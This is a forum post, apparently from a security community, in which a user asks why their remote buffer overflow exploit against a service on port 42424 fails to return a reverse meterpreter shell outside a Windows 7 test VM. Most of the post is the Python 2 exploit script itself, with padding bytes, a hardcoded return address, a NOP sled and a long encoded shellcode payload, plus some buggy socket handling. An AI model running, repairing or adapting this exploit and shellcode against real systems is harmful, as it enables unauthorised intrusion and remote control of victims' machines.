Jump to content

Can someone please help me with my BOF code


Recommended Posts

Hi I am attempting to exploit a remote buffer overflow as part of a test lab environment. 

The exploit works fine in a Windows 7 test VM and i can get a reverse meterpreter to my Kali Linux VM with ASLR turned off on the Windows VM.

However when I attempt this in the test environment against the machine that I know is running the application on port 42424 I do not get the reverses shell now i have tried this with both x86 and x64 shellcode, if i test locally on the Kali machine i can crash the application but again also do not get a shell my exploit code is below 

#!/usr/bin/env python2
import socket

ServiceManagerIP = "127.0.0.1"
ServiceManagerPort = 42424

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ServiceManagerIP, ServiceManagerPort))


payload = "\xc3"*146    #Junk Bytes
#77E9F7DF

payload += "\xDF\xF7\xE9\x77" + "\x90" *16

#Shellcode to be executed by application

payload += ("\xdb\xca\xd9\x74\x24\xf4\xb8\x0b\x9d\x83\x98\x5f\x2b\xc9\xb1"
"\x52\x83\xc7\x04\x31\x47\x13\x03\x4c\x8e\x61\x6d\xae\x58\xe7"
"\x8e\x4e\x99\x88\x07\xab\xa8\x88\x7c\xb8\x9b\x38\xf6\xec\x17"
"\xb2\x5a\x04\xa3\xb6\x72\x2b\x04\x7c\xa5\x02\x95\x2d\x95\x05"
"\x15\x2c\xca\xe5\x24\xff\x1f\xe4\x61\xe2\xd2\xb4\x3a\x68\x40"
"\x28\x4e\x24\x59\xc3\x1c\xa8\xd9\x30\xd4\xcb\xc8\xe7\x6e\x92"
"\xca\x06\xa2\xae\x42\x10\xa7\x8b\x1d\xab\x13\x67\x9c\x7d\x6a"
"\x88\x33\x40\x42\x7b\x4d\x85\x65\x64\x38\xff\x95\x19\x3b\xc4"
"\xe4\xc5\xce\xde\x4f\x8d\x69\x3a\x71\x42\xef\xc9\x7d\x2f\x7b"
"\x95\x61\xae\xa8\xae\x9e\x3b\x4f\x60\x17\x7f\x74\xa4\x73\xdb"
"\x15\xfd\xd9\x8a\x2a\x1d\x82\x73\x8f\x56\x2f\x67\xa2\x35\x38"
"\x44\x8f\xc5\xb8\xc2\x98\xb6\x8a\x4d\x33\x50\xa7\x06\x9d\xa7"
"\xc8\x3c\x59\x37\x37\xbf\x9a\x1e\xfc\xeb\xca\x08\xd5\x93\x80"
"\xc8\xda\x41\x06\x98\x74\x3a\xe7\x48\x35\xea\x8f\x82\xba\xd5"
"\xb0\xad\x10\x7e\x5a\x54\xf3\x41\x33\x39\x82\x2a\x46\xc5\x9a"
"\xcb\xcf\x23\xc8\x1b\x86\xfc\x65\x85\x83\x76\x17\x4a\x1e\xf3"
"\x17\xc0\xad\x04\xd9\x21\xdb\x16\x8e\xc1\x96\x44\x19\xdd\x0c"
"\xe0\xc5\x4c\xcb\xf0\x80\x6c\x44\xa7\xc5\x43\x9d\x2d\xf8\xfa"
"\x37\x53\x01\x9a\x70\xd7\xde\x5f\x7e\xd6\x93\xe4\xa4\xc8\x6d"
"\xe4\xe0\xbc\x21\xb3\xbe\x6a\x84\x6d\x71\xc4\x5e\xc1\xdb\x80"
"\x27\x29\xdc\xd6\x27\x64\xaa\x36\x99\xd1\xeb\x49\x16\xb6\xfb"
"\x32\x4a\x26\x03\xe9\xce\x56\x4e\xb3\x67\xff\x17\x26\x3a\x62"
"\xa8\x9d\x79\x9b\x2b\x17\x02\x58\x33\x52\x07\x24\xf3\x8f\x75"
"\x35\x96\xaf\x2a\x36\xb3")

s.send(payload+"\r\n")
data = s.recv(len(msg))
s.recv(1024)
s.close()
print data

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...